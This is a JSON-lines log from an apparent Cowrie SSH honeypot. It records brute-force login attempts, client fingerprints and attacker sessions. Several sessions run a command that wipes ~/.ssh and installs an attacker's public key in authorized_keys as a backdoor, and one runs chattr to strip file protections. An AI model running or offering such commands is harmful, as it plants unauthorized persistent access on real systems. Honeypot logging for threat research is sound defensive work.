{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.310073Z","src_ip":"212.227.125.160","session":"97253eef0fa2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.424185Z","session":"97253eef0fa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54600,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e0d6390e9fe","protocol":"ssh","message":"New connection: 212.227.235.229:54600 (1.2.3.4:22) [session: 2e0d6390e9fe]","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.581595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.585957Z","src_ip":"212.227.235.229","session":"2e0d6390e9fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.693009Z","src_ip":"212.227.235.229","session":"2e0d6390e9fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.892191Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"123456","message":"login attempt [muhammad/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T06:26:59.130866Z","src_ip":"212.227.235.229","session":"2e0d6390e9fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:59.270612Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:26:59.271579Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:26:59.636848Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:59.637806Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33585,"dst_ip":"1.2.3.4","dst_port":22,"session":"f47a7c340f14","protocol":"ssh","message":"New connection: 212.227.235.229:33585 (1.2.3.4:22) [session: f47a7c340f14]","sensor":"my-vps","timestamp":"2025-09-09T06:27:00.004636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:00.005960Z","src_ip":"212.227.235.229","session":"f47a7c340f14"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:00.243839Z","src_ip":"212.227.235.229","session":"2e0d6390e9fe"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:00.355079Z","src_ip":"212.227.235.229","session":"f47a7c340f14"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:01.746277Z","src_ip":"212.227.235.229","session":"f47a7c340f14"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:03.105330Z","src_ip":"212.227.235.229","session":"f47a7c340f14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34482,"dst_ip":"1.2.3.4","dst_port":22,"session":"86c77c71624b","protocol":"ssh","message":"New connection: 212.227.235.229:34482 (1.2.3.4:22) [session: 86c77c71624b]","sensor":"my-vps","timestamp":"2025-09-09T06:27:03.523430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:03.524389Z","src_ip":"212.227.235.229","session":"86c77c71624b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:03.946844Z","src_ip":"212.227.235.229","session":"86c77c71624b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:27:05.764741Z","src_ip":"212.227.235.229","session":"86c77c71624b"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:06.162415Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:06.164924Z","src_ip":"212.227.235.229","session":"86c77c71624b"}
{"eventid":"cowrie.session.connect","src_ip":"1.92.34.210","src_port":50182,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d7b533a852d","protocol":"ssh","message":"New connection: 1.92.34.210:50182 (1.2.3.4:22) [session: 7d7b533a852d]","sensor":"my-vps","timestamp":"2025-09-09T06:27:07.173490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:27:07.179327Z","src_ip":"1.92.34.210","session":"7d7b533a852d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T06:27:07.419052Z","src_ip":"1.92.34.210","session":"7d7b533a852d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:15.180658Z","src_ip":"1.92.34.210","session":"7d7b533a852d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38249,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcaa235b410e","protocol":"ssh","message":"New connection: 212.227.235.229:38249 (1.2.3.4:22) [session: bcaa235b410e]","sensor":"my-vps","timestamp":"2025-09-09T06:27:18.837194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:18.838407Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:19.176846Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":38602,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b3ea28243aa","protocol":"ssh","message":"New connection: 92.118.39.62:38602 (1.2.3.4:22) [session: 2b3ea28243aa]","sensor":"my-vps","timestamp":"2025-09-09T06:27:20.168081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:27:20.168940Z","src_ip":"92.118.39.62","session":"2b3ea28243aa"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:27:20.199598Z","src_ip":"92.118.39.62","session":"2b3ea28243aa"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123","message":"login attempt [centos/123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:20.291710Z","src_ip":"92.118.39.62","session":"2b3ea28243aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Attitude","message":"login attempt [root/Attitude] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:27:20.710733Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:21.323062Z","src_ip":"92.118.39.62","session":"2b3ea28243aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:27:21.434757Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:27:21.435433Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:27:21.436436Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:22.104053Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:27:22.494960Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:27:22.495639Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:27:22.846374Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:22.847332Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38976,"dst_ip":"1.2.3.4","dst_port":22,"session":"534b43c488a8","protocol":"ssh","message":"New connection: 212.227.235.229:38976 (1.2.3.4:22) [session: 534b43c488a8]","sensor":"my-vps","timestamp":"2025-09-09T06:27:23.187386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:23.188067Z","src_ip":"212.227.235.229","session":"534b43c488a8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:23.526356Z","src_ip":"212.227.235.229","session":"534b43c488a8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:24.997428Z","src_ip":"212.227.235.229","session":"534b43c488a8"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:26.338035Z","src_ip":"212.227.235.229","session":"534b43c488a8"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":57368,"dst_ip":"1.2.3.4","dst_port":22,"session":"542172d0d177","protocol":"ssh","message":"New connection: 157.20.207.165:57368 (1.2.3.4:22) [session: 542172d0d177]","sensor":"my-vps","timestamp":"2025-09-09T06:27:26.715379Z"}
